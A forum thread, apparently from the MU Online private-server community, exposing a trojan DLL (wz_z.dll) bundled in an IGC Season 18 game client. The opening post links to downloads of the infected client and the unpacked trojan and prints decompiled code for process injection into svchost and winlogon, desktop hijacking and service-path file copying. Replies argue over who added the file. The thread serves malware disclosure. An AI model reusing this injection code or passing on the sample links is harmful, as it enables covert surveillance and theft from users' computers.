IGC S18 Client WZ_Z.dll Code Reserved Analysis.

Client Sample:IGC Season 18 Part1-3 Client.
Trojan File:wz_z.dll.
Download link:
FullClient（Sample）:
https://mega.nz/file/fRoDgKjI#UEJMEZ...JsisZh9R_bEUy4
NoDataFolderClient(Sample):
https://mega.nz/file/fNAF3SaB#KevEeB...Xph75W94QrCyx4
Unpacked Trojan dll:
https://mega.nz/file/fNAF3SaB#KevEeB...Xph75W94QrCyx4
Trojan behavior:
+Remote monitor user Screen and Desktop.
+Steal user files.
+Injection OS (Windows System) Critical process.
+Record Mouse and Keyboard Event.
+Infection user DNS.
+Etc.
Note: The client contains Trojan dll files, which will be detected by the antivirus software. Please download and unrar it in a virtual machine or other environment.

wz_z.dll Trojan critical code:

Attachment 173213

Dll Entry:

1 2 3 4 5 6 7 8 9 10 11

BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { hModule = hinstDLL; if ( fdwReason == 1 && dword_1003055C < 1 ) { ++dword_1003055C; CreateThread(0, 0, StartAddress, 0, 0, 0); } return 1; }

C++ Code

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

char __cdecl StartServer(CHAR *Src) { HDESK v2[4]; // [esp+4h] [ebp-2DCh] BYREF HDESK v3[4]; // [esp+14h] [ebp-2CCh] BYREF struct WSAData WSAData; // [esp+24h] [ebp-2BCh] BYREF char v5[296]; // [esp+1B4h] [ebp-12Ch] BYREF Trojan_AdjustTokenPrivileges(); Trojan_GetUserDesktopAccess(v3); Trojan_GetUserDesktopAccess(v2); CreateMutexA(0, 0, Name); if ( !WSAStartup(0x202u, &WSAData) ) { sub_1000A970(v5); sub_1000A7A0(Src + 256); sub_1000D990(Src); while ( 1 ) Sleep(0x3E8u); } Trojan_SetProcessWindowStation(v2); Trojan_SetProcessWindowStation(v3); return 0; }

C++ Code

1 2 3 4 5 6 7 8 9 10 11 12

BOOL __stdcall EnumFunc(HWND hWnd, _DWORD *a2) { BOOL result; // eax CHAR ClassName[100]; // [esp+8h] [ebp-68h] BYREF GetClassNameA(hWnd, ClassName, 100); result = _mbscmp((const unsigned __int8 *)ClassName, "Internet Explorer_Server"); if ( result ) return 1; *a2 = hWnd; return result; }

C++ Code

1 2 3 4 5 6 7 8 9 10 11 12

char DownCtrlAltDel() { char v1[16]; // [esp+0h] [ebp-20h] BYREF char v2[16]; // [esp+10h] [ebp-10h] BYREF Trojan_SetThreadDesktop_Entry(v1, "Winlogon"); Trojan_SetThreadDesktop_Entry(v2, "Winlogon"); PostMessageA(HWND_BROADCAST, 0x312u, 0, 3014659); Trojan_SetProcessWindowStation((int)v2); Trojan_SetProcessWindowStation((int)v1); return 1; }

C++ Code

1 2 3 4 5 6 7 8 9 10 11 12

char __cdecl WaitServer(void *Src) { HDESK v2[4]; // [esp+0h] [ebp-20h] BYREF HDESK v3[4]; // [esp+10h] [ebp-10h] BYREF Trojan_GetUserDesktopAccess(v2); Trojan_GetUserDesktopAccess(v3); Trojan_CopyFile(Src, 0, 1); Trojan_SetProcessWindowStation((int)v3); Trojan_SetProcessWindowStation((int)v2); return 0; }

C++ Code

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

int __cdecl Trojan_Inject_Entry(DWORD dwProcessId, const void *a2, const char *a3) { HMODULE ModuleHandleA; // edi int v5[4]; // [esp+Ch] [ebp-448h] BYREF CHAR Filename[260]; // [esp+1Ch] [ebp-438h] BYREF char v7[260]; // [esp+120h] [ebp-334h] BYREF char v8[556]; // [esp+224h] [ebp-230h] BYREF ModuleHandleA = GetModuleHandleA("kernel32.dll"); v5[1] = (int)GetProcAddress(ModuleHandleA, "GetProcAddress"); v5[0] = (int)GetProcAddress(ModuleHandleA, "LoadLibraryA"); v5[2] = (int)GetProcAddress(ModuleHandleA, "FreeLibrary"); strcpy(v7, a3); GetModuleFileNameA(hModule, Filename, 0x104u); qmemcpy(v8, a2, sizeof(v8)); return Trojan_Inject(dwProcessId, sub_100067B0, 0x800u, v5, 0x444u, 0x3E8u); }

C++ Code

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67

char Trojan_Inject_SysCritical() { const CHAR *v0; // eax DWORD v1; // esi DWORD v2; // eax const CHAR *v3; // eax HDESK v5[4]; // [esp+10h] [ebp-524h] BYREF HDESK v6[4]; // [esp+20h] [ebp-514h] BYREF void *v7; // [esp+30h] [ebp-504h] BYREF int v8; // [esp+34h] [ebp-500h] int v9; // [esp+38h] [ebp-4FCh] CHAR String1[556]; // [esp+40h] [ebp-4F4h] BYREF int v11[89]; // [esp+26Ch] [ebp-2C8h] BYREF char v12[200]; // [esp+3D0h] [ebp-164h] BYREF char v13[112]; // [esp+498h] [ebp-9Ch] BYREF LPCSTR lpString2[5]; // [esp+508h] [ebp-2Ch] BYREF unsigned int v15; // [esp+51Ch] [ebp-18h] int v16; // [esp+530h] [ebp-4h] Trojan_AdjustTokenPrivileges(); Trojan_GetUserDesktopAccess(v6); v16 = 0; Trojan_GetUserDesktopAccess(v5); LOBYTE(v16) = 1; sub_10008060((int)v13); v0 = lpString2[0]; LOBYTE(v16) = 2; if ( v15 < 0x10 ) v0 = (const CHAR *)lpString2; lstrcpyA(::String1, v0); sub_10009C70(v11); sprintf(Name, "Wait_%s", v12); sprintf(aVipshellEventS, "Start_Wait_%s", v12); sprintf(aVipshellEventS_0, "StopWait_%s", v12); CreateMutexA(0, 0, Name); if ( GetLastError() != 183 ) { do v1 = Trojan_FindProcessWithExeName("winlogon.exe"); while ( !v1 ); v7 = 0; v8 = 0; v9 = 0; LOBYTE(v16) = 3; sub_10009E40(&v7); FindWindowA("Notepad", 0); v2 = Trojan_FindProcessWithExeName("svchost.exe"); Trojan_Inject_Entry(v2, (int)v11, (int)"StartServer"); v3 = lpString2[0]; if ( v15 < 0x10 ) v3 = (const CHAR *)lpString2; lstrcpyA(String1, v3); Trojan_Inject_Entry(v1, (int)String1, (int)"WaitServer"); if ( v7 ) operator delete(v7); v7 = 0; v8 = 0; v9 = 0; } LOBYTE(v16) = 1; sub_10007A20(v13); LOBYTE(v16) = 0; Trojan_SetProcessWindowStation((int)v5); v16 = -1; Trojan_SetProcessWindowStation((int)v6); return 0; }

C++ Code

1 2 3 4 5 6 7 8 9

HDESK *__thiscall Trojan_ScreenControl(HDESK *this) { sub_10001E80(); *this = (HDESK)&CScreenControlProc::`vftable'; sub_10004E50(this + 3); Trojan_GetUserDesktopAccess(this + 16); this[15] = (HDESK)GetTickCount(); return this; }

C++ Code

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87

int __cdecl Trojan_CopyFile(char *Src, LPCSTR lpServiceName, int a3) { ..................Omitted here............................ if ( lpServiceName ) { sub_10008060(); v36 = 0; sub_10007DC0((char *)lpExistingFileName, Src, strlen(Src)); sub_100083B0(lpNewFileName, (int)v23, "wins"); LOBYTE(v36) = 1; sub_10007BB0((int)lpNewFileName, (void *)"svchost.exe", 0xBu); v4 = lpNewFileName[0]; if ( v30 < 0x10 ) v4 = (const CHAR *)lpNewFileName; v5 = lpExistingFileName[0]; if ( v26 < 0x10 ) v5 = (const CHAR *)lpExistingFileName; CopyFileA(v5, v4, 0); v6 = lpNewFileName[0]; if ( v30 < 0x10 ) v6 = (const CHAR *)lpNewFileName; Trojan_ChangeServiceConfig(lpServiceName, v6); if ( !(_BYTE)a3 ) { v7 = lpNewFileName[0]; if ( v30 < 0x10 ) v7 = (const CHAR *)lpNewFileName; DeleteFileA(v7); } sub_100083B0(lpFileName, (int)v23, "ShellExt"); LOBYTE(v36) = 2; sub_10007BB0((int)lpFileName, "lsass.exe", 9u); ..................Omitted here............................ sub_10007BB0((int)v27, (void *)"svchost.exe", 0xBu); v16 = v27[0]; if ( v28 < 0x10 ) v16 = (const CHAR *)v27; v17 = lpExistingFileName[0]; if ( v26 < 0x10 ) v17 = (const CHAR *)lpExistingFileName; CopyFileA(v17, v16, 0); if ( (_BYTE)a3 ) { v18 = (LPCSTR *)v27[0]; if ( v28 < 0x10 ) v18 = v27; sub_10007EC0(v18, 0); } else { sub_10007EC0((void *)Dependencies, 0); v19 = v27[0]; if ( v28 < 0x10 ) v19 = (const CHAR *)v27; DeleteFileA(v19); } if ( v28 >= 0x10 ) operator delete((void *)v27[0]); v28 = 15; v27[4] = 0; LOBYTE(v27[0]) = 0; if ( v35 >= 0x10 ) operator delete((void *)v33[0]); v35 = 15; v34 = 0; LOBYTE(v33[0]) = 0; if ( v32 >= 0x10 ) operator delete((void *)lpFileName[0]); v32 = 15; lpFileName[4] = 0; LOBYTE(lpFileName[0]) = 0; if ( v30 >= 0x10 ) operator delete((void *)lpNewFileName[0]); v30 = 15; lpNewFileName[4] = 0; LOBYTE(lpNewFileName[0]) = 0; v36 = -1; return sub_10007A20(); } else { result = sub_10009C70(v20); if ( (_BYTE)result ) return Trojan_CopyFile(Src, ServiceName, a3); } return result; }

Etc.

thread approved, use at your own risk. preferably install this over a virtual machine/virtualbox if worried about viruses or such.

Not sure if there is need to reply to misinformation, but wz_z.dll is not part of IGCN files, its added by someone else , perhaps server owner. If you dont believe, ask any of our customers that we dont ship client with such file. Do your research better before posting that it is IGCN Trojan :)

We dont have any control of what server owners ship to their players together with the client, but we dont ship any viruses to our customers or their players. You may provide link to the server so we can take some action as we disagree with such actions towards MU Community.

Weird thing that i found something similar in 4 different igcn clients, wz_zp is named, is the same?

wz_zp.dll = Webzen bz2 library.
wz_z.dll should not be existent

It's incredible that all IGC S18 chs clients have this file wz_ z.dll (not wz_zp.dll, which is Webzen's). Now when players mention IGC, they 'll say: Trojans Server,Trojans IGC.

This is to create bad image about IGCN in Chinese markets by bad actors. It's sad to see people do that.

Players don't know who the Trojan is created, because most players know little about computers. They can only see the IGC on the screen or on MuClient Title.

Thank you for this information. We will take actions and make it impossible to ship our clients with viruses freely

ou... shit. Other ptivate MU uses something similar, was reversing it to ))) .Fak private server devs! That retard team uses same shit. via WSOCK sends and receive commands from server, but RAT was active only while client was running. poor mu players!
These dayz devs are getting crazy. RAT in Mu - Client ))) Don`````t play private servers, u dont have idea what these retard does to your os!

Quote:

---

+Remote monitor user Screen and Desktop.
+can down and up files
+Injection OS (Windows System) Critical process.

---

These options i noticed to. took me a while to clean os and recovery disabled security options
--------------------------------------------------------------------------------------------------------------------------------------------

Ps. i dont wanna do naming and shaming, but that dev team is one of the biggest in private mu.

PSS.
IGC i was reversing to. a C->S AUTH (HW BAN system), to be honest i dint noticed anything suspicious in client files nor any RAT activity. But i dint checked VM functions and theres maaaaany of them...

Only thirdparty plugins.

Even though I have reason to hate the IGC, BUUUUUT it's not their responsibility.

* Today it is necessary to be able to include a plugin on the client side for small customizations and details. The market demands it.Unfortunately, whoever provides this type of service almost always has a bit of bad intentions in it.

Many times, the customer not knows that these functions are inside the external plugin that was purchased.

Finaly someon took attention to what is happening when mu client wants elevated privileges.

this should be the dumbest movement i've seen from a server admins, hurting their own community to scam people, in past i have seen people using player clients as botnet to ddos other's servers, wasnt a full trojan like this one.

i will only suggest rename thread to something less sugestive to IGCN Team as they arent the ones to blame.

This file is not the original IGCN file, it is only used by Chinese GMs and has nothing to do with IGCN

This file is not the original IGCN file, it is only used by Chinese GMs and has nothing to do with IGCN.The host is boring.